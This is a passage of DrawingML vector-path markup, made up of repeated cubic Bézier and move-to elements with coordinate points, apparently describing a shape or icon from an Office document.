                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292" y="21"/>
                    <a:pt x="292" y="21"/>
                    <a:pt x="292" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292" y="21"/>
                    <a:pt x="292" y="21"/>
                    <a:pt x="292" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292" y="21"/>
                    <a:pt x="292" y="21"/>
                    <a:pt x="292" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292" y="22"/>
                    <a:pt x="292" y="22"/>
                    <a:pt x="292" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292" y="22"/>
                    <a:pt x="292" y="22"/>
                    <a:pt x="292" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292" y="23"/>
                    <a:pt x="292" y="23"/>
                    <a:pt x="292" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292" y="23"/>
                    <a:pt x="292" y="23"/>
                    <a:pt x="292" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="23"/>
                    <a:pt x="293" y="23"/>
                    <a:pt x="293" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="23"/>
                    <a:pt x="293" y="23"/>
                    <a:pt x="293" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="294" y="23"/>
                    <a:pt x="294" y="23"/>
                    <a:pt x="294" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="294" y="23"/>
                    <a:pt x="294" y="23"/>
                    <a:pt x="294" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="294" y="23"/>
                    <a:pt x="294" y="23"/>
                    <a:pt x="294" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="294" y="23"/>
                    <a:pt x="294" y="23"/>
                    <a:pt x="294" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="295" y="23"/>
                    <a:pt x="295" y="23"/>
                    <a:pt x="295" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="295" y="23"/>
                    <a:pt x="296" y="23"/>
                    <a:pt x="296" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="297" y="23"/>
                    <a:pt x="297" y="23"/>
                    <a:pt x="297" y="23"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="290" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="289" y="20"/>
                    <a:pt x="289" y="20"/>
                    <a:pt x="289" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289" y="20"/>
                    <a:pt x="289" y="20"/>
                    <a:pt x="289" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289" y="20"/>
                    <a:pt x="289" y="20"/>
                    <a:pt x="289" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="288" y="20"/>
                    <a:pt x="288" y="20"/>
                    <a:pt x="288" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="288" y="20"/>
                    <a:pt x="288" y="20"/>
                    <a:pt x="288" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="288" y="20"/>
                    <a:pt x="288" y="20"/>
                    <a:pt x="288" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289" y="21"/>
                    <a:pt x="289" y="21"/>
                    <a:pt x="289" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289" y="21"/>
                    <a:pt x="289" y="21"/>
                    <a:pt x="289" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="290" y="21"/>
                    <a:pt x="290" y="21"/>
                    <a:pt x="290" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="290" y="21"/>
                    <a:pt x="290" y="21"/>
                    <a:pt x="290" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="290" y="21"/>
                    <a:pt x="290" y="21"/>
                    <a:pt x="290" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="290" y="21"/>
                    <a:pt x="290" y="21"/>
                    <a:pt x="290" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="290" y="20"/>
                    <a:pt x="290" y="20"/>
                    <a:pt x="290" y="20"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="287" y="16"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="286" y="16"/>
                    <a:pt x="286" y="16"/>
                    <a:pt x="284" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="16"/>
                    <a:pt x="284" y="16"/>
                    <a:pt x="284" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="16"/>
                    <a:pt x="284" y="16"/>
                    <a:pt x="284" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="285" y="16"/>
                    <a:pt x="286" y="17"/>
                    <a:pt x="287" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="286" y="17"/>
                    <a:pt x="286" y="17"/>
                    <a:pt x="286" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="285" y="17"/>
                    <a:pt x="285" y="17"/>
                    <a:pt x="285" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="16"/>
                    <a:pt x="283" y="16"/>
                    <a:pt x="283" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="15"/>
                    <a:pt x="282" y="15"/>
                    <a:pt x="282" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="15"/>
                    <a:pt x="282" y="15"/>
                    <a:pt x="282" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="16"/>
                    <a:pt x="283" y="16"/>
                    <a:pt x="283" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283" y="16"/>
                    <a:pt x="282" y="16"/>
                    <a:pt x="282" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="281" y="16"/>
                    <a:pt x="281" y="16"/>
                    <a:pt x="280" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="280" y="15"/>
                    <a:pt x="280" y="15"/>
                    <a:pt x="280" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="280" y="15"/>
                    <a:pt x="280" y="15"/>
                    <a:pt x="280" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="279" y="15"/>
                    <a:pt x="279" y="15"/>
                    <a:pt x="279" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="279" y="15"/>
                    <a:pt x="279" y="15"/>
                    <a:pt x="279" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="279" y="15"/>
                    <a:pt x="279" y="15"/>
                    <a:pt x="279" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="278" y="15"/>
                    <a:pt x="278" y="15"/>
                    <a:pt x="278" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="278" y="16"/>
                    <a:pt x="278" y="16"/>
                    <a:pt x="282" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="281" y="18"/>
                    <a:pt x="281" y="18"/>
                    <a:pt x="281" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="281" y="18"/>
                    <a:pt x="282" y="18"/>
                    <a:pt x="282" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="18"/>
                    <a:pt x="282" y="18"/>
                    <a:pt x="282" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283" y="18"/>
                    <a:pt x="283" y="19"/>
                    <a:pt x="284" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="19"/>
                    <a:pt x="285" y="19"/>
                    <a:pt x="285" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="285" y="20"/>
                    <a:pt x="285" y="20"/>
                    <a:pt x="286" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="285" y="19"/>
                    <a:pt x="285" y="19"/>
                    <a:pt x="285" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="286" y="19"/>
                    <a:pt x="286" y="19"/>
                    <a:pt x="287" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="287" y="19"/>
                    <a:pt x="287" y="19"/>
                    <a:pt x="287" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="287" y="19"/>
                    <a:pt x="287" y="19"/>
                    <a:pt x="287" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="287" y="19"/>
                    <a:pt x="287" y="19"/>
                    <a:pt x="287" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="287" y="19"/>
                    <a:pt x="287" y="19"/>
                    <a:pt x="287" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="287" y="19"/>
                    <a:pt x="287" y="19"/>
                    <a:pt x="287" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="287" y="19"/>
                    <a:pt x="287" y="19"/>
                    <a:pt x="287" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="287" y="19"/>
                    <a:pt x="287" y="19"/>
                    <a:pt x="287" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="287" y="19"/>
                    <a:pt x="287" y="19"/>
                    <a:pt x="287" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="286" y="18"/>
                    <a:pt x="286" y="18"/>
                    <a:pt x="286" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="287" y="18"/>
                    <a:pt x="287" y="19"/>
                    <a:pt x="288" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="288" y="18"/>
                    <a:pt x="287" y="18"/>
                    <a:pt x="287" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="287" y="18"/>
                    <a:pt x="287" y="18"/>
                    <a:pt x="287" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="288" y="18"/>
                    <a:pt x="288" y="18"/>
                    <a:pt x="288" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="288" y="18"/>
                    <a:pt x="288" y="18"/>
                    <a:pt x="289" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="290" y="18"/>
                    <a:pt x="290" y="18"/>
                    <a:pt x="290" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="288" y="17"/>
                    <a:pt x="288" y="17"/>
                    <a:pt x="288" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="287" y="16"/>
                    <a:pt x="287" y="16"/>
                    <a:pt x="287" y="16"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="278" y="16"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="278" y="16"/>
                    <a:pt x="278" y="16"/>
                    <a:pt x="278" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="278" y="16"/>
                    <a:pt x="278" y="16"/>
                    <a:pt x="278" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="277" y="16"/>
                    <a:pt x="277" y="16"/>
                    <a:pt x="277" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="277" y="16"/>
                    <a:pt x="277" y="16"/>
                    <a:pt x="277" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="277" y="16"/>
                    <a:pt x="277" y="16"/>
                    <a:pt x="277" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="278" y="17"/>
                    <a:pt x="278" y="17"/>
                    <a:pt x="278" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="279" y="17"/>
                    <a:pt x="279" y="17"/>
                    <a:pt x="279" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="279" y="17"/>
                    <a:pt x="279" y="17"/>
                    <a:pt x="279" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="279" y="17"/>
                    <a:pt x="279" y="17"/>
                    <a:pt x="279" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="279" y="17"/>
                    <a:pt x="279" y="17"/>
                    <a:pt x="279" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="279" y="17"/>
                    <a:pt x="279" y="17"/>
                    <a:pt x="278" y="16"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="286" y="22"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="286" y="22"/>
                    <a:pt x="287" y="22"/>
                    <a:pt x="287" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="287" y="22"/>
                    <a:pt x="287" y="22"/>
                    <a:pt x="287" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="286" y="22"/>
                    <a:pt x="286" y="22"/>
                    <a:pt x="286" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="286" y="22"/>
                    <a:pt x="285" y="21"/>
                    <a:pt x="285" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="285" y="21"/>
                    <a:pt x="285" y="21"/>
                    <a:pt x="285" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="21"/>
                    <a:pt x="284" y="21"/>
                    <a:pt x="283" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283" y="20"/>
                    <a:pt x="283" y="20"/>
                    <a:pt x="283" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="21"/>
                    <a:pt x="285" y="21"/>
                    <a:pt x="285" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="286" y="22"/>
                    <a:pt x="286" y="22"/>
                    <a:pt x="286" y="22"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="243" y="11"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="11"/>
                    <a:pt x="243" y="11"/>
                    <a:pt x="243" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="11"/>
                    <a:pt x="243" y="11"/>
                    <a:pt x="243" y="11"/>
                  </a:cubicBez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41" y="10"/>
                    <a:pt x="241" y="10"/>
                    <a:pt x="241" y="10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3" y="11"/>
                    <a:pt x="243" y="11"/>
                    <a:pt x="243" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="11"/>
                    <a:pt x="243" y="11"/>
                    <a:pt x="243" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="11"/>
                    <a:pt x="243" y="11"/>
                    <a:pt x="243" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="11"/>
                    <a:pt x="243" y="11"/>
                    <a:pt x="243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43" y="11"/>
                    <a:pt x="243" y="11"/>
                    <a:pt x="243" y="11"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="234" y="14"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="14"/>
                    <a:pt x="234" y="14"/>
                    <a:pt x="234" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="13"/>
                    <a:pt x="233" y="13"/>
                    <a:pt x="233" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="13"/>
                    <a:pt x="233" y="13"/>
                    <a:pt x="233" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="13"/>
                    <a:pt x="233" y="13"/>
                    <a:pt x="233" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="13"/>
                    <a:pt x="233" y="13"/>
                    <a:pt x="233" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="13"/>
                    <a:pt x="233" y="13"/>
                    <a:pt x="233" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="13"/>
                    <a:pt x="233" y="13"/>
                    <a:pt x="233" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="13"/>
                    <a:pt x="233" y="13"/>
                    <a:pt x="232" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="14"/>
                    <a:pt x="232" y="14"/>
                    <a:pt x="232" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="14"/>
                    <a:pt x="233" y="14"/>
                    <a:pt x="233" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="14"/>
                    <a:pt x="233" y="14"/>
                    <a:pt x="233" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="14"/>
                    <a:pt x="233" y="14"/>
                    <a:pt x="233" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="14"/>
                    <a:pt x="234" y="14"/>
                    <a:pt x="234" y="14"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="241" y="10"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="241" y="10"/>
                    <a:pt x="241" y="10"/>
                    <a:pt x="241" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="9"/>
                    <a:pt x="240" y="9"/>
                    <a:pt x="240" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="9"/>
                    <a:pt x="240" y="9"/>
                    <a:pt x="240" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="9"/>
                    <a:pt x="239" y="9"/>
                    <a:pt x="239" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="8"/>
                    <a:pt x="238" y="8"/>
                    <a:pt x="238" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="9"/>
                    <a:pt x="238" y="9"/>
                    <a:pt x="238" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="9"/>
                    <a:pt x="238" y="9"/>
                    <a:pt x="238" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="9"/>
                    <a:pt x="238" y="9"/>
                    <a:pt x="238" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="9"/>
                    <a:pt x="238" y="9"/>
                    <a:pt x="238" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="8"/>
                    <a:pt x="238" y="8"/>
                    <a:pt x="238" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="8"/>
                    <a:pt x="238" y="8"/>
                    <a:pt x="238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6" y="8"/>
                    <a:pt x="236" y="8"/>
                    <a:pt x="236" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="9"/>
                    <a:pt x="236" y="9"/>
                    <a:pt x="236" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="9"/>
                    <a:pt x="236" y="9"/>
                    <a:pt x="236" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="9"/>
                    <a:pt x="236" y="9"/>
                    <a:pt x="236" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="10"/>
                    <a:pt x="236" y="10"/>
                    <a:pt x="236" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="10"/>
                    <a:pt x="236" y="10"/>
                    <a:pt x="236" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="10"/>
                    <a:pt x="236" y="10"/>
                    <a:pt x="236" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="11"/>
                    <a:pt x="236" y="11"/>
                    <a:pt x="236" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="11"/>
                    <a:pt x="237" y="12"/>
                    <a:pt x="237" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="11"/>
                    <a:pt x="237" y="11"/>
                    <a:pt x="237" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="11"/>
                    <a:pt x="237" y="11"/>
                    <a:pt x="237" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="11"/>
                    <a:pt x="238" y="11"/>
                    <a:pt x="238" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="11"/>
                    <a:pt x="238" y="11"/>
                    <a:pt x="238" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="11"/>
                    <a:pt x="239" y="11"/>
                    <a:pt x="239" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="11"/>
                    <a:pt x="239" y="11"/>
                    <a:pt x="239" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="10"/>
                    <a:pt x="239" y="10"/>
                    <a:pt x="239" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="10"/>
                    <a:pt x="240" y="10"/>
                    <a:pt x="240" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="10"/>
                    <a:pt x="240" y="10"/>
                    <a:pt x="240" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="10"/>
                    <a:pt x="240" y="10"/>
                    <a:pt x="240" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="241" y="10"/>
                    <a:pt x="241" y="10"/>
                    <a:pt x="241" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="241" y="10"/>
                    <a:pt x="241" y="10"/>
                    <a:pt x="241" y="10"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="235" y="7"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="6"/>
                    <a:pt x="234" y="6"/>
                    <a:pt x="234" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="7"/>
                    <a:pt x="234" y="7"/>
                    <a:pt x="234" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="7"/>
                    <a:pt x="234" y="7"/>
                    <a:pt x="234" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="7"/>
                    <a:pt x="233" y="7"/>
                    <a:pt x="233" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="7"/>
                    <a:pt x="233" y="7"/>
                    <a:pt x="233" y="7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31" y="7"/>
                    <a:pt x="231" y="7"/>
                    <a:pt x="231" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="7"/>
                    <a:pt x="231" y="7"/>
                    <a:pt x="231" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="7"/>
                    <a:pt x="231" y="7"/>
                    <a:pt x="231" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="8"/>
                    <a:pt x="230" y="8"/>
                    <a:pt x="230" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="8"/>
                    <a:pt x="230" y="8"/>
                    <a:pt x="230" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="8"/>
                    <a:pt x="231" y="8"/>
                    <a:pt x="231" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="8"/>
                    <a:pt x="231" y="8"/>
                    <a:pt x="231" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="9"/>
                    <a:pt x="231" y="9"/>
                    <a:pt x="231" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="9"/>
                    <a:pt x="232" y="9"/>
                    <a:pt x="233" y="9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4" y="9"/>
                    <a:pt x="234" y="9"/>
                    <a:pt x="235" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="9"/>
                    <a:pt x="235" y="9"/>
                    <a:pt x="235" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="9"/>
                    <a:pt x="236" y="9"/>
                    <a:pt x="236" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="8"/>
                    <a:pt x="235" y="8"/>
                    <a:pt x="235" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="8"/>
                    <a:pt x="235" y="8"/>
                    <a:pt x="235" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="8"/>
                    <a:pt x="235" y="8"/>
                    <a:pt x="235" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="7"/>
                    <a:pt x="235" y="7"/>
                    <a:pt x="235" y="7"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="233" y="5"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="5"/>
                    <a:pt x="233" y="5"/>
                    <a:pt x="233" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="5"/>
                    <a:pt x="233" y="5"/>
                    <a:pt x="233" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="5"/>
                    <a:pt x="233" y="5"/>
                    <a:pt x="233" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="5"/>
                    <a:pt x="232" y="5"/>
                    <a:pt x="232" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="4"/>
                    <a:pt x="232" y="4"/>
                    <a:pt x="231" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="4"/>
                    <a:pt x="231" y="4"/>
                    <a:pt x="231" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="5"/>
                    <a:pt x="231" y="5"/>
                    <a:pt x="231" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="5"/>
                    <a:pt x="231" y="5"/>
                    <a:pt x="231" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="5"/>
                    <a:pt x="230" y="5"/>
                    <a:pt x="230" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="5"/>
                    <a:pt x="230" y="5"/>
                    <a:pt x="230" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="5"/>
                    <a:pt x="230" y="5"/>
                    <a:pt x="230" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="5"/>
                    <a:pt x="230" y="5"/>
                    <a:pt x="230" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="6"/>
                    <a:pt x="229" y="6"/>
                    <a:pt x="229" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="6"/>
                    <a:pt x="229" y="6"/>
                    <a:pt x="229" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
